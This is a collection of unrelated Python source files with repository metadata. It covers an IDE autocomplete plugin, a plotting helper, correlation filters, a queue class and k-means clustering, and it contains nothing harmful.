self.text.get("insert-{}c".format(typed_len), "insert") get_workbench().event_generate( "AutocompleteInsertion", text_widget=self.text, typed_prefix=typed_prefix, completed_name=completion["name"], ) if self._is_visible(): self._close() if not completion["name"].startswith(typed_prefix): # eg. case of the prefix was not correct self.text.delete("insert-{}c".format(typed_len), "insert") self.text.insert("insert", completion["name"]) else: self.text.insert("insert", completion["complete"]) def _get_filename(self): # TODO: allow completing in shell if not isinstance(self.text, CodeViewText): return None codeview = self.text.master editor = get_workbench().get_editor_notebook().get_current_editor() if editor.get_code_view() is codeview: return editor.get_filename() else: return None def _move_selection(self, delta): selected = self.curselection() if len(selected) == 0: index = 0 else: index = selected[0] index += delta index = max(0, min(self.size() - 1, index)) self.selection_clear(0, self.size() - 1) self.selection_set(index) self.activate(index) self.see(index) self._update_doc() def _get_request_id(self): return "autocomplete_" + str(self.text.winfo_id()) def _get_position(self): return map(int, self.text.index("insert").split(".")) def _on_text_keypress(self, event=None): if not self._is_visible(): return None if event.keysym == "Escape": self._close() return "break" elif event.keysym in ["Up", "KP_Up"]: self._move_selection(-1) return "break" elif event.keysym in ["Down", "KP_Down"]: self._move_selection(1) return "break" elif event.keysym in ["Return", "KP_Enter", "Tab"]: assert self.size() > 0 self._insert_current_selection() return "break" return None def _insert_current_selection(self, event=None): self._insert_completion(self._get_selected_completion()) def _get_selected_completion(self): sel = self.curselection() if len(sel) != 1: return None return self.completions[sel[0]] def _on_text_change(self, event=None): if self._is_visible(): self.handle_autocomplete_request() def _close(self, event=None): self.place_forget() self.doc_label.place_forget() self.text.focus_set() def on_text_click(self, event=None): if self._is_visible(): self._close() class ShellCompleter(Completer): def _bind_result_event(self): # TODO: remove binding when editor gets closed get_workbench().bind( "shell_autocomplete_response", self._handle_backend_response, True ) def handle_autocomplete_request(self): source = self._get_prefix() get_runner().send_command(InlineCommand("shell_autocomplete", source=source)) def _handle_backend_response(self, msg): # check if the response is relevant for current state if msg.source != self._get_prefix(): self._close() else: self._present_completions(msg.completions) def _get_prefix(self): return self.text.get("input_start", "insert") # TODO: allow multiple line input def handle_autocomplete_request(event=None): if event is None: text = get_workbench().focus_get() else: text = event.widget _handle_autocomplete_request_for_text(text) def _handle_autocomplete_request_for_text(text): if not hasattr(text, "autocompleter"): if isinstance(text, (CodeViewText, ShellText)): if isinstance(text, CodeViewText): text.autocompleter = Completer(text) elif isinstance(text, ShellText): text.autocompleter = ShellCompleter(text) text.bind("<1>", text.autocompleter.on_text_click) else: return text.autocompleter.handle_autocomplete_request() def patched_perform_midline_tab(text, event): if isinstance(text, ShellText): option_name = "edit.tab_complete_in_shell" else: option_name = "edit.tab_complete_in_editor" if get_workbench().get_option(option_name): if not text.has_selection(): _handle_autocomplete_request_for_text(text) return "break" else: return None return text.perform_smart_tab(event) def load_plugin() -> None: get_workbench().add_command( "autocomplete", "edit", _("Auto-complete"), handle_autocomplete_request, default_sequence="<Control-space>" # TODO: tester ) get_workbench().set_default("edit.tab_complete_in_editor", True) get_workbench().set_default("edit.tab_complete_in_shell", True) CodeViewText.perform_midline_tab = patched_perform_midline_tab # type: ignore ShellText.perform_midline_tab = patched_perform_midline_tab # type: ignore
31.731988
130
0.593407
fc13e2f330dbcc1f63bbf4a3976928b70e6368a5
4,447
py
Python
DataVisulization.py
Islanderrobotics/data-visulization
b3e66073b65554a0ffd63918a75c4e13bca591f8
[ "MIT" ]
null
null
null
DataVisulization.py
Islanderrobotics/data-visulization
b3e66073b65554a0ffd63918a75c4e13bca591f8
[ "MIT" ]
null
null
null
DataVisulization.py
Islanderrobotics/data-visulization
b3e66073b65554a0ffd63918a75c4e13bca591f8
[ "MIT" ]
null
null
null
import matplotlib.pyplot as plt import pandas as pd from PyQt5 import QtWidgets import math import sys class NotAnOpption(Exception): pass class NeedsToBeATuple(Exception): pass class MissingColumnNames(Exception): pass class DataVisulization: def __init__(self, data = None,type_of_plot = "", column_values_for_x = None, column_values_for_y = None,alpha = None): self.data = data self.alpha = alpha self.x = column_values_for_x self.y = column_values_for_y self.type_of_plot = type_of_plot plt.rcParams["figure.figsize"]= self.FindingScreenSize_() if type_of_plot.upper() == "HIST": self.Hist() elif(self.x is not None and self.y is not None): if type_of_plot.upper() == "LINE": self.Line() elif type_of_plot.upper() == "SCATTER": self.Scatter() elif(self.x is None or self.y is None): raise MissingColumnNames(column_values_for_x and column_values_for_y) else: raise NotAnOpption def FindingScreenSize_(self): app = QtWidgets.QApplication(sys.argv) screen = app.primaryScreen() size = screen.size() Screensize = (size.width()/96, size.height()/96) return Screensize def ByeByeText(self,df,varlist): copy = df.copy() count= 0 if (isinstance(varlist,str)): if(copy[varlist].dtype == "object"): print("that will cause an error") else: for i in varlist: if (copy[i].dtype == "object"): varlist.pop(count) copy.drop(columns= i, inplace=True) count+=1 return (copy) def Hist(self): final_size = self.FindingScreenSize_() self.data.hist(figsize= final_size) plt.show() def Line(self): if (isinstance(self.y, list)): self.DfLine() else: plt.plot(self.x,self.y) def DfLine(self): count = 1 if (isinstance(self.y,list)): copy = self.ByeByeText(self.data,self.y) for i in self.y: if (math.sqrt(len(self.y)).is_integer()): plt.subplot(round(math.sqrt(len(self.y))),round(math.sqrt(len(self.y))),count) else: plt.subplot(round(math.sqrt(len(self.y))) + 1, round(math.sqrt(len(self.y))), count) plt.plot(copy[self.x], copy[i]) count += 1 elif (isinstance(self.x, list)): copy = self.ByeByeText(self.data, self.x) for i in self.x: if math.sqrt(len(self.x)).is_integer(): plt.subplot(round(math.sqrt(len(self.x))), round(math.sqrt(len(self.x))), count) else: plt.subplot(round(math.sqrt(len(self.x))) + 1, round(math.sqrt(len(self.x))), count) plt.plot(copy[i], copy[self.y]) count += 1 else: plt.plot(self.data[self.x], y=self.data[self.y]) plt.show() def Scatter(self): if (isinstance(self.data, pd.DataFrame)): self.Dfscatter() else: plt.scatter(x=self.x, y=self.y, alpha=self.alpha) def Dfscatter(self): count = 1 if (isinstance(self.y, list)): copy = self.ByeByeText(self.data, self.y) for i in self.y: if (math.sqrt(len(self.y)).is_integer()): plt.subplot(round(math.sqrt(len(self.y))), round(math.sqrt(len(self.y))), count) else: plt.subplot(round(math.sqrt(len(self.y))) + 1, round(math.sqrt(len(self.y))), count) plt.scatter(copy[self.x], copy[i], alpha=self.alpha) count += 1 elif (isinstance(self.x, list)): copy = self.ByeByeText(self.data, self.x) for i in self.x: if (math.sqrt(len(self.x)).is_integer()): plt.subplot(round(math.sqrt(len(self.x))), round(math.sqrt(len(self.x))), count) else: plt.subplot(round(math.sqrt(len(self.x))) + 1, round(math.sqrt(len(self.x))), count) plt.scatter(copy[i], copy[self.y], alpha=self.alpha) count += 1 else: plt.scatter(self.data[self.x], y=self.data[self.y]) plt.show()
37.686441
123
0.53969
7e9e8d89aaa35444aee0dc3a001cc53d16e8d4f9
16,346
py
Python
scripts/ocof/filters/common.py
wolfram2012/ros_track_ssd
c98d54eb923e5bae5fde4abbedda2fe5ba716606
[ "MIT" ]
null
null
null
scripts/ocof/filters/common.py
wolfram2012/ros_track_ssd
c98d54eb923e5bae5fde4abbedda2fe5ba716606
[ "MIT" ]
null
null
null
scripts/ocof/filters/common.py
wolfram2012/ros_track_ssd
c98d54eb923e5bae5fde4abbedda2fe5ba716606
[ "MIT" ]
null
null
null
# Copyright 2010, David S. Bolme, Colorado State University Research # Foundation # # Colorado State University Software Evaluation License Agreement # # This license agreement ("License"), effective today, is made by and between # you (hereinafter referred to as the "Licensee") and the Board of Governors of # the Colorado State University System acting by and through Colorado State # University, an institution of higher education of the State of Colorado, # located at Fort Collins, Colorado, 80523-2002 ("CSU"), and concerns certain # software described as "Correlation Filters for Detection, Recognition, and # Registration," a system of software programs for advanced video signal # processing and analysis. # # 1. General. A non-exclusive, nontransferable, perpetual license is granted # to the Licensee to install and use the Software for academic, non-profit, # or government-sponsored research purposes. Use of the Software under this # License is restricted to non-commercial purposes. Commercial use of the # Software requires a separately executed written license agreement. # # 2. Permitted Use and Restrictions. Licensee agrees that it will use the # Software, and any modifications, improvements, or derivatives to the # Software that the Licensee may create (collectively, "Improvements") # solely for internal, non-commercial purposes and shall not distribute, # transfer, deploy, or externally expose the Software or Improvements to any # person or third parties without prior written permission from CSU. The # term "non-commercial," as used in this License, means academic or other # scholarly research which (a) is not undertaken for profit, or (b) is not # intended to produce works, services, or data for commercial use, or (c) is # neither conducted, nor funded, by a person or an entity engaged in the # commercial use, application or exploitation of works similar to the # Software. # # 3. Ownership and Assignment of Copyright. The Licensee acknowledges that # CSU has the right to offer this copyright in the Software and associated # documentation only to the extent described herein, and the offered # Software and associated documentation are the property of CSU. The # Licensee agrees that any Improvements made by Licensee shall be subject # to the same terms and conditions as the Software. Licensee agrees not to # assert a claim of infringement in Licensee copyrights in Improvements in # the event CSU prepares substantially similar modifications or derivative # works. The Licensee agrees to use his/her reasonable best efforts to # protect the contents of the Software and to prevent unauthorized # disclosure by its agents, officers, employees, and consultants. If the # Licensee receives a request to furnish all or any portion of the Software # to a third party, Licensee will not fulfill such a request but will refer # the third party to the CSU Computer Science website # http://www.cs.colostate.edu/~vision/ocof.html so that the third party's # use of this Software will be subject to the terms and conditions of this # License. Notwithstanding the above, Licensee may disclose any # Improvements that do not involve disclosure of the Software. # # 4. Copies. The Licensee may make a reasonable number of copies of the # Software for the purposes of backup, maintenance of the Software or the # development of derivative works based on the Software. These additional # copies shall carry the copyright notice and shall be controlled by this # License, and will be destroyed along with the original by the Licensee # upon termination of the License. # # 5. Acknowledgement. Licensee agrees that any publication of results obtained # with the Software will acknowledge its use by an appropriate citation as # specified in the documentation. # # 6. Acknowledgment. CSU acknowledges that the Software executes patent pending # Algorithms for the purpose of non-commercial uses. Licensee acknowledges # that this Agreement does not constitute a commercial license to the # Algorithms. Licensee may apply for a commercial license to the Algorithms # from Colorado State University Research Foundation by visiting # http://www.csuventures.org. # # 7. Disclaimer of Warranties and Limitation of Liability. THE SOFTWARE IS # PROVIDED "AS IS," WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY # AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. CSU MAKES NO # REPRESENTATION OR WARRANTY THAT THE SOFTWARE WILL NOT INFRINGE ANY PATENT # OR OTHER PROPRIETARY RIGHT. IN NO EVENT SHALL CSU BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY # OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF # SUCH DAMAGE. # # 8. Termination. This License is effective until terminated by either party. # Your rights under this License will terminate automatically without notice # from CSU if you fail to comply with any term(s) of this License. Upon # termination of this License, you shall immediately discontinue all use of # the Software and destroy the original and all copies, full or partial, of # the Software, including any modifications or derivative works, and # associated documentation. # # 9. Governing Law and General Provisions. This License shall be governed by # the laws of the State of Colorado, excluding the application of its # conflicts of law rules. This License shall not be governed by the United # Nations Convention on Contracts for the International Sale of Goods, the # application of which is expressly excluded. If any provisions of this # License are held invalid or unenforceable for any reason, the remaining # provisions shall remain in full force and effect. This License is binding # upon any heirs and assigns of the Licensee. The License granted to # Licensee hereunder may not be assigned or transferred to any other person # or entity without the express consent of the Regents. This License # constitutes the entire agreement between the parties with respect to the # use of the Software licensed hereunder and supersedes all other previous # or contemporaneous agreements or understandings between the parties, # whether verbal or written, concerning the subject matter. ''' This Created on Apr 18, 2010 @author: bolme ''' import numpy as np import pyvision as pv import scipy as sp import scipy.ndimage class CorrelationFilter: ''' This class implements many methods and interfaces that are common to all filters. ''' def __init__(self, size, norm_log=False, norm_meanunit=True, norm_window = pv.cosineWindow, bbox=None, ilog=None): '''Initial some of the basic elements of the correlation filter.''' # Set the size of this filter self.size = size # Setup Normalization Steps self.norm_log = norm_log self.norm_meanunit = norm_meanunit self.norm_window = norm_window # Only search for peaks in this bounding box self.bbox = bbox # A member variable for the filter stored in the fourier domain self.filter = None # Caches used for resized versions of the filter and windows self.window_cache = {} self.filter_cache = {} # Fast Local Maximum Detector (Created when first needed) self.maximum_detector = None def preprocess(self, tile, ilog=None): ''' Implements some standard preprocessing for all filters. ''' # Get the image tile as a numpy matrix. if isinstance(tile,pv.Image): mat = tile.asMatrix2D() else: # Assume it is already a matrix mat = tile # Apply a logarithmic transformation to pixel values. if self.norm_log: mat = np.log(mat + 1) # print "tile is:",mat # Transform pixel values to have a mean of zero and unit length if self.norm_meanunit: mat = pv.meanUnit(mat) # print "mat is:",mat # Window the input tile to reduce fourier edge effects. window = self._resizeWindow(mat.shape) if window is not None: mat = mat * window if ilog != None: ilog(pv.Image(mat),label="PREPROCESSED") return mat def addTraining(self, tile, output, ilog=None): ''' Add training data. This method should be overridden by sub classes. Subclasses should compute the filter and assign the Fourier domain filter to the member variable self.filter''' raise NotImplementedError() def train(self,ilog=None): '''This should be overridden by subclasses. Subclasses should compute the filter and assign the Fourier domain filter to the member variable self.filter''' raise NotImplementedError() def correlate(self, tile, F=None, phase_only=False, ilog=None): '''''' # Correlate with the filter if F == None: # Preprocess the image mat = self.preprocess(tile,ilog=ilog) F = np.fft.fft2(mat) G = self._resizeFilter(F.shape) * F if phase_only: G = G/np.abs(G) g = np.fft.ifft2(G) # Return just the real part return g.real def locate(self, tile, corr=None, subpixel_est=True, bbox=None, ilog=None): '''''' if corr == None: corr = self.correlate(tile,ilog=ilog) if bbox == None: bbox = self.bbox if bbox: #print "CorrShape:",corr.shape idx = corr[bbox[0]:bbox[1],bbox[2]:bbox[3]].argmax() _,h = corr[bbox[0]:bbox[1],bbox[2]:bbox[3]].shape x = bbox[0]+idx/h y = bbox[2]+idx%h else: idx = corr.argmax() _,h = corr.shape x = idx/h y = idx%h if subpixel_est: dx,dy = subpixel(corr[x-3:x+4,y-3:y+4]) x += dx y += dy return pv.Point(x,y) def detect(self,tile,corr=None,compute_psrs=False,ilog=None): if corr == None: corr = self.correlate(tile,ilog=ilog) # Create the maximum detector the first time it is needed if self.maximum_detector == None: self.maximum_detector = pv.LocalMaximumDetector() # Find local maximums in the filter response points, values = self.maximum_detector(corr,threshold=0.0) if compute_psrs: # Compute psrs w,h = corr.shape corrf = corr.flatten() psrs = [] for x,y in points: pk = corr[x,y] # Mask out the sidelobe mask = np.zeros([w,h],dtype=np.bool) mask[x-10:x+11,y-10:y+11] = True mask[x-5:x+6,y-5:y+6] = False mask = mask.flatten() sidelobe = corrf[mask] # compute the psr mn = sidelobe.mean() sd = sidelobe.std() psr = (pk-mn)/sd if np.isnan(psr): psrs.append(0) else: psrs.append(psr) points = [pv.Point(x,y) for x,y in points] if compute_psrs: return np.array(points), values, np.array(psrs) return np.array(points), values def psr(self, tile, corr=None, ilog=None): ''' Compute the peak to sidelobe ratio. This is a good measure of quality. ''' if corr == None: corr = self.correlate(tile,ilog=ilog) rows,cols = corr.shape # Find the peak i = corr.argmax() x,y = i/cols, i%cols corr = corr.flatten() pk = corr[i] # Mask out the sidelobe mask = np.ones([rows,cols],dtype=np.bool) mask[x-5:x+6,y-5:y+6] = False mask = mask.flatten() sidelobe = corr[mask] # compute the psr mn = sidelobe.mean() sd = sidelobe.std() return (pk-mn)/sd def asImage(self, ilog=None): '''''' mat = np.fft.ifft2(self.filter.conj()) mat = np.fft.fftshift(mat) return pv.Image(mat.real) def asSpectrum(self): return self.filter*self.filter.conj() def scale(self,scale,order=3): ''' Create a scaled copy of the correlation filter. @param scale: a scale factor. @param order: the order of spline interpolation. @returns: A rescaled correlation filter @rtype: ocof.CorrelationFilter ''' filter = np.fft.ifft2(self.filter) filter = sp.ndimage.zoom(filter,scale,order=order) result = CorrelationFilter(self.size, norm_log=self.norm_log, norm_meanunit=self.norm_meanunit, norm_window = self.norm_window, bbox=self.bbox) result.filter = np.fft.fft2(filter) return result def _resizeFilter(self,size): ''' Resize the filter ''' if size == self.filter.shape: return self.filter if not self.filter_cache.has_key(size): filter = np.fft.ifft2(self.filter) w,h = size fw,fh = filter.shape tmp = np.zeros((w,h), np.complex128) #TODO: check this w = min(w,fw) h = min(h,fh) tmp[ :w/2, :h/2] = filter[ :w/2, :h/2] tmp[ :w/2,-h/2:] = filter[ :w/2,-h/2:] tmp[-w/2:,-h/2:] = filter[-w/2:,-h/2:] tmp[-w/2:, :h/2] = filter[-w/2:, :h/2] self.filter_cache[size] = np.fft.fft2(tmp) return self.filter_cache[size] def _resizeWindow(self,size): if self.norm_window == None: return None if not self.window_cache.has_key(size): window = self.norm_window(size) self.window_cache[size] = window return self.window_cache[size] def subpixel(b): # TODO: Locations may always be estimated low w,h = b.shape x = np.arange(w).reshape((w,1)) * np.ones((1,h)) - w/2 y = np.arange(h).reshape((1,h)) * np.ones((w,1)) - w/2 x = x.flatten() y = y.flatten() c = np.ones((w,h)).flatten() A = np.array([x*x,x,y*y,y,c]).transpose() b = b.flatten() try: coef = np.linalg.lstsq(A,b) except: return 0.0,0.0 a,b,c,d,_ = coef[0] x = -b/a y = -d/c if x > 1 or x < -1 or y > 1 or y < -1: return 0.0,0.0 return x,y def createPointTarget(x,y,size,sigma=2.0,**kwargs): '''Create a target with a Gaussian shaped peak of 1.0 at x,y and is 0.0 everywhere else.''' x = np.arange(size[0])-x y = np.arange(size[1])-y scale = 1.0/(sigma*sigma) target = np.exp(-scale*x*x).reshape(size[0],1)*np.exp(-scale*y*y).reshape(1,size[1]) return target def createDeltaTarget(x,y,size,**kwargs): '''Create a target that has a value of 1.0 at x,y and is 0.0 everywhere else.''' x = int(round(x)) y = int(round(y)) target = np.zeros(size,dtype=np.float64) target[x,y] = 1.0 return target
38.28103
193
0.617643
b4640cd42f81db86c34b5fc2981d8d05cf3de419
1,229
py
Python
src/ds/queue/queue_abc.py
MitraThakker/DataStructuresInPython
96bd661821e5aa082caf55f027090f8a2c602158
[ "MIT" ]
2
2019-03-28T07:46:52.000Z
2019-03-28T07:46:52.000Z
src/ds/queue/queue_abc.py
MitraThakker/DataStructuresInPython
96bd661821e5aa082caf55f027090f8a2c602158
[ "MIT" ]
null
null
null
src/ds/queue/queue_abc.py
MitraThakker/DataStructuresInPython
96bd661821e5aa082caf55f027090f8a2c602158
[ "MIT" ]
null
null
null
from abc import ABC, abstractmethod from src.errors import ( QueueOverflow, QueueUnderflow ) class Queue(ABC): def __init__(self, capacity: int = 16): self.__q = list() self.capacity = capacity @property def q(self): return self.__q @abstractmethod def enqueue(self, item): if len(self.q) == self.capacity: raise QueueOverflow self.q.append(item) @abstractmethod def dequeue(self): try: return self.q.pop(0) except IndexError: raise QueueUnderflow @abstractmethod def peek(self): try: return self.q[0] except IndexError: raise QueueUnderflow @abstractmethod def is_full(self): return len(self.q) == self.capacity @abstractmethod def is_empty(self): return len(self.q) == 0 @abstractmethod def __str__(self): output_str = 'F|' for i in self.q: output_str += f' {i} |' output_str += 'R' return output_str @abstractmethod def __len__(self): return len(self.q) @abstractmethod def __contains__(self, item): return item in self.q
20.147541
43
0.57201
89ea0503d4c57583aafa4e13c30ce7035bb79660
73
py
Python
location/__init__.py
ohahlev/ahlev-django-location
7d6060ab7b21509f53790f5863b596f2b95c286a
[ "BSD-3-Clause" ]
null
null
null
location/__init__.py
ohahlev/ahlev-django-location
7d6060ab7b21509f53790f5863b596f2b95c286a
[ "BSD-3-Clause" ]
null
null
null
location/__init__.py
ohahlev/ahlev-django-location
7d6060ab7b21509f53790f5863b596f2b95c286a
[ "BSD-3-Clause" ]
null
null
null
__version__ = '0.0.1' default_app_config = 'location.apps.LocationConfig'
36.5
51
0.794521
b44012476dcbb844bbfc20d20557a77c55b1cc84
13,262
py
Python
machine_learning/k_means_clust.py
TeddyFirman/Algorithm_Python
edbd50a97a62c2beb2a187e4c411c677aa43115e
[ "MIT" ]
null
null
null
machine_learning/k_means_clust.py
TeddyFirman/Algorithm_Python
edbd50a97a62c2beb2a187e4c411c677aa43115e
[ "MIT" ]
null
null
null
machine_learning/k_means_clust.py
TeddyFirman/Algorithm_Python
edbd50a97a62c2beb2a187e4c411c677aa43115e
[ "MIT" ]
null
null
null
"""README, Author - Anurag Kumar(mailto:anuragkumarak95@gmail.com) Requirements: - sklearn - numpy - matplotlib Python: - 3.5 Inputs: - X , a 2D numpy array of features. - k , number of clusters to create. - initial_centroids , initial centroid values generated by utility function(mentioned in usage). - maxiter , maximum number of iterations to process. - heterogeneity , empty list that will be filled with hetrogeneity values if passed to kmeans func. Usage: 1. define 'k' value, 'X' features array and 'hetrogeneity' empty list 2. create initial_centroids, initial_centroids = get_initial_centroids( X, k, seed=0 # seed value for initial centroid generation, # None for randomness(default=None) ) 3. find centroids and clusters using kmeans function. centroids, cluster_assignment = kmeans( X, k, initial_centroids, maxiter=400, record_heterogeneity=heterogeneity, verbose=True # whether to print logs in console or not.(default=False) ) 4. Plot the loss function, hetrogeneity values for every iteration saved in hetrogeneity list. plot_heterogeneity( heterogeneity, k ) 5. Transfers Dataframe into excel format it must have feature called 'Clust' with k means clustering numbers in it. """ import warnings import numpy as np import pandas as pd from matplotlib import pyplot as plt from sklearn.metrics import pairwise_distances warnings.filterwarnings("ignore") TAG = "K-MEANS-CLUST/ " def get_initial_centroids(data, k, seed=None): """Randomly choose k data points as initial centroids""" if seed is not None: # useful for obtaining consistent results np.random.seed(seed) n = data.shape[0] # number of data points # Pick K indices from range [0, N). rand_indices = np.random.randint(0, n, k) # Keep centroids as dense format, as many entries will be nonzero due to averaging. # As long as at least one document in a cluster contains a word, # it will carry a nonzero weight in the TF-IDF vector of the centroid. centroids = data[rand_indices, :] return centroids def centroid_pairwise_dist(X, centroids): return pairwise_distances(X, centroids, metric="euclidean") def assign_clusters(data, centroids): # Compute distances between each data point and the set of centroids: # Fill in the blank (RHS only) distances_from_centroids = centroid_pairwise_dist(data, centroids) # Compute cluster assignments for each data point: # Fill in the blank (RHS only) cluster_assignment = np.argmin(distances_from_centroids, axis=1) return cluster_assignment def revise_centroids(data, k, cluster_assignment): new_centroids = [] for i in range(k): # Select all data points that belong to cluster i. Fill in the blank (RHS only) member_data_points = data[cluster_assignment == i] # Compute the mean of the data points. Fill in the blank (RHS only) centroid = member_data_points.mean(axis=0) new_centroids.append(centroid) new_centroids = np.array(new_centroids) return new_centroids def compute_heterogeneity(data, k, centroids, cluster_assignment): heterogeneity = 0.0 for i in range(k): # Select all data points that belong to cluster i. Fill in the blank (RHS only) member_data_points = data[cluster_assignment == i, :] if member_data_points.shape[0] > 0: # check if i-th cluster is non-empty # Compute distances from centroid to data points (RHS only) distances = pairwise_distances( member_data_points, [centroids[i]], metric="euclidean" ) squared_distances = distances ** 2 heterogeneity += np.sum(squared_distances) return heterogeneity def plot_heterogeneity(heterogeneity, k): plt.figure(figsize=(7, 4)) plt.plot(heterogeneity, linewidth=4) plt.xlabel("# Iterations") plt.ylabel("Heterogeneity") plt.title(f"Heterogeneity of clustering over time, K={k:d}") plt.rcParams.update({"font.size": 16}) plt.show() def kmeans( data, k, initial_centroids, maxiter=500, record_heterogeneity=None, verbose=False ): """This function runs k-means on given data and initial set of centroids. maxiter: maximum number of iterations to run.(default=500) record_heterogeneity: (optional) a list, to store the history of heterogeneity as function of iterations if None, do not store the history. verbose: if True, print how many data points changed their cluster labels in each iteration""" centroids = initial_centroids[:] prev_cluster_assignment = None for itr in range(maxiter): if verbose: print(itr, end="") # 1. Make cluster assignments using nearest centroids cluster_assignment = assign_clusters(data, centroids) # 2. Compute a new centroid for each of the k clusters, averaging all data # points assigned to that cluster. centroids = revise_centroids(data, k, cluster_assignment) # Check for convergence: if none of the assignments changed, stop if ( prev_cluster_assignment is not None and (prev_cluster_assignment == cluster_assignment).all() ): break # Print number of new assignments if prev_cluster_assignment is not None: num_changed = np.sum(prev_cluster_assignment != cluster_assignment) if verbose: print( " {:5d} elements changed their cluster assignment.".format( num_changed ) ) # Record heterogeneity convergence metric if record_heterogeneity is not None: # YOUR CODE HERE score = compute_heterogeneity(data, k, centroids, cluster_assignment) record_heterogeneity.append(score) prev_cluster_assignment = cluster_assignment[:] return centroids, cluster_assignment # Mock test below if False: # change to true to run this test case. from sklearn import datasets as ds dataset = ds.load_iris() k = 3 heterogeneity = [] initial_centroids = get_initial_centroids(dataset["data"], k, seed=0) centroids, cluster_assignment = kmeans( dataset["data"], k, initial_centroids, maxiter=400, record_heterogeneity=heterogeneity, verbose=True, ) plot_heterogeneity(heterogeneity, k) def ReportGenerator( df: pd.DataFrame, ClusteringVariables: np.ndarray, FillMissingReport=None ) -> pd.DataFrame: """ Function generates easy-erading clustering report. It takes 2 arguments as an input: DataFrame - dataframe with predicted cluester column; FillMissingReport - dictionary of rules how we are going to fill missing values of for final report generate (not included in modeling); in order to run the function following libraries must be imported: import pandas as pd import numpy as np >>> data = pd.DataFrame() >>> data['numbers'] = [1, 2, 3] >>> data['col1'] = [0.5, 2.5, 4.5] >>> data['col2'] = [100, 200, 300] >>> data['col3'] = [10, 20, 30] >>> data['Cluster'] = [1, 1, 2] >>> ReportGenerator(data, ['col1', 'col2'], 0) Features Type Mark 1 2 0 # of Customers ClusterSize False 2.000000 1.000000 1 % of Customers ClusterProportion False 0.666667 0.333333 2 col1 mean_with_zeros True 1.500000 4.500000 3 col2 mean_with_zeros True 150.000000 300.000000 4 numbers mean_with_zeros False 1.500000 3.000000 .. ... ... ... ... ... 99 dummy 5% False 1.000000 1.000000 100 dummy 95% False 1.000000 1.000000 101 dummy stdev False 0.000000 NaN 102 dummy mode False 1.000000 1.000000 103 dummy median False 1.000000 1.000000 <BLANKLINE> [104 rows x 5 columns] """ # Fill missing values with given rules if FillMissingReport: df.fillna(value=FillMissingReport, inplace=True) df["dummy"] = 1 numeric_cols = df.select_dtypes(np.number).columns report = ( df.groupby(["Cluster"])[ # construct report dataframe numeric_cols ] # group by cluster number .agg( [ ("sum", np.sum), ("mean_with_zeros", lambda x: np.mean(np.nan_to_num(x))), ("mean_without_zeros", lambda x: x.replace(0, np.NaN).mean()), ( "mean_25-75", lambda x: np.mean( np.nan_to_num( sorted(x)[ round(len(x) * 25 / 100) : round(len(x) * 75 / 100) ] ) ), ), ("mean_with_na", np.mean), ("min", lambda x: x.min()), ("5%", lambda x: x.quantile(0.05)), ("25%", lambda x: x.quantile(0.25)), ("50%", lambda x: x.quantile(0.50)), ("75%", lambda x: x.quantile(0.75)), ("95%", lambda x: x.quantile(0.95)), ("max", lambda x: x.max()), ("count", lambda x: x.count()), ("stdev", lambda x: x.std()), ("mode", lambda x: x.mode()[0]), ("median", lambda x: x.median()), ("# > 0", lambda x: (x > 0).sum()), ] ) .T.reset_index() .rename(index=str, columns={"level_0": "Features", "level_1": "Type"}) ) # rename columns # calculate the size of cluster(count of clientID's) clustersize = report[ (report["Features"] == "dummy") & (report["Type"] == "count") ].copy() # avoid SettingWithCopyWarning clustersize.Type = ( "ClusterSize" # rename created cluster df to match report column names ) clustersize.Features = "# of Customers" clusterproportion = pd.DataFrame( clustersize.iloc[:, 2:].values / clustersize.iloc[:, 2:].values.sum() # calculating the proportion of cluster ) clusterproportion[ "Type" ] = "% of Customers" # rename created cluster df to match report column names clusterproportion["Features"] = "ClusterProportion" cols = clusterproportion.columns.tolist() cols = cols[-2:] + cols[:-2] clusterproportion = clusterproportion[cols] # rearrange columns to match report clusterproportion.columns = report.columns a = pd.DataFrame( abs( report[report["Type"] == "count"].iloc[:, 2:].values - clustersize.iloc[:, 2:].values ) ) # generating df with count of nan values a["Features"] = 0 a["Type"] = "# of nan" a.Features = report[ report["Type"] == "count" ].Features.tolist() # filling values in order to match report cols = a.columns.tolist() cols = cols[-2:] + cols[:-2] a = a[cols] # rearrange columns to match report a.columns = report.columns # rename columns to match report report = report.drop( report[report.Type == "count"].index ) # drop count values except cluster size report = pd.concat( [report, a, clustersize, clusterproportion], axis=0 ) # concat report with clustert size and nan values report["Mark"] = report["Features"].isin(ClusteringVariables) cols = report.columns.tolist() cols = cols[0:2] + cols[-1:] + cols[2:-1] report = report[cols] sorter1 = { "ClusterSize": 9, "ClusterProportion": 8, "mean_with_zeros": 7, "mean_with_na": 6, "max": 5, "50%": 4, "min": 3, "25%": 2, "75%": 1, "# of nan": 0, "# > 0": -1, "sum_with_na": -2, } report = ( report.assign( Sorter1=lambda x: x.Type.map(sorter1), Sorter2=lambda x: list(reversed(range(len(x)))), ) .sort_values(["Sorter1", "Mark", "Sorter2"], ascending=False) .drop(["Sorter1", "Sorter2"], axis=1) ) report.columns.name = "" report = report.reset_index() report.drop(columns=["index"], inplace=True) return report if __name__ == "__main__": import doctest doctest.testmod()
37.463277
89
0.57661
da66865ef4504b413d256162bc5ab22b217c46d1
4,451
py
Python
dm_control/suite/wrappers/pixels.py
hzm2016/dm_control
c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711
[ "Apache-2.0" ]
2
2019-02-14T23:41:45.000Z
2022-02-10T04:08:44.000Z
dm_control/suite/wrappers/pixels.py
jiajunhua/deepmind-dm_control
c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711
[ "Apache-2.0" ]
1
2019-03-02T13:37:17.000Z
2019-03-02T13:37:17.000Z
dm_control/suite/wrappers/pixels.py
svikramank/dm_control
c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711
[ "Apache-2.0" ]
1
2018-11-20T04:39:05.000Z
2018-11-20T04:39:05.000Z
